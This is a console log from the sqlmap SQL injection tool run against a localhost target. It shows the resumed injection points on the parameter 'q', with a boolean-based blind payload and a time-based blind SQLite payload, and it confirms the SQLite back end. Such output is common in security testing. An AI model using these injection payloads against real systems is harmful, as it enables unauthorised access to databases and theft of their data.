        ___
       __H__
 ___ ___["]_____ ___ ___  {1.9.9#stable}
|_ -| . [(]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:54:07 /2025-09-15/

[16:54:07] [INFO] resuming back-end DBMS 'sqlite' 
[16:54:07] [INFO] testing connection to the target URL
[16:54:07] [INFO] testing NULL connection to the target URL
[16:54:07] [INFO] NULL connection is supported with HEAD method ('Content-Length')
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: q (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: q=test%' AND 1556=1556 AND 'siIx%'='siIx

    Type: time-based blind
    Title: SQLite > 2.0 AND time-based blind (heavy query)
    Payload: q=test%' AND 1098=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND 'plqG%'='plqG
---
[16:54:07] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[16:54:07] [WARNING] on SQLite it is not possible to enumerate databases (use only '--tables')
[16:54:07] [INFO] fetched data logged to text files under '/home/lucifer/.local/share/sqlmap/output/localhost'

[*] ending @ 16:54:07 /2025-09-15/

